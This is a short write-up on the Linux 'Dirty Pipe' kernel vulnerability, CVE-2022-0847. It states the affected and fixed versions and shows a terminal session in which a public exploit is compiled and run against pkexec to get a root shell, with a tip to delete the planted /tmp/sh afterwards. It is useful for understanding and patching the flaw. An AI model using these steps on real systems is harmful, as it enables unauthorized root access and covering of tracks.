This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
$ gcc dirtypipez.c -o dirtypipez $ file dirtypipez dirtypipez: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f7aee8d04713d6c27bc73e3f5fb59b1eee5feeaf, for GNU/Linux 3.2.0, not stripped
$ id uid=1000(crypt0rr) gid=1000(crypt0rr) groups=1000(crypt0rr) $ ./dirtypipez /usr/bin/pkexec [+] hijacking suid binary.. [+] dropping suid shell.. [+] restoring suid binary.. [+] popping root shell.. (dont forget to clean up /tmp/sh ;)) # whoami root #
The vulnerable binary is run from
/tmp/sh. Remember to remove it after using/re-using.
$ ls -l /tmp/sh -rwsr-xr-x 1 root crypt0rr 186 Mar 8 10:19 /tmp/sh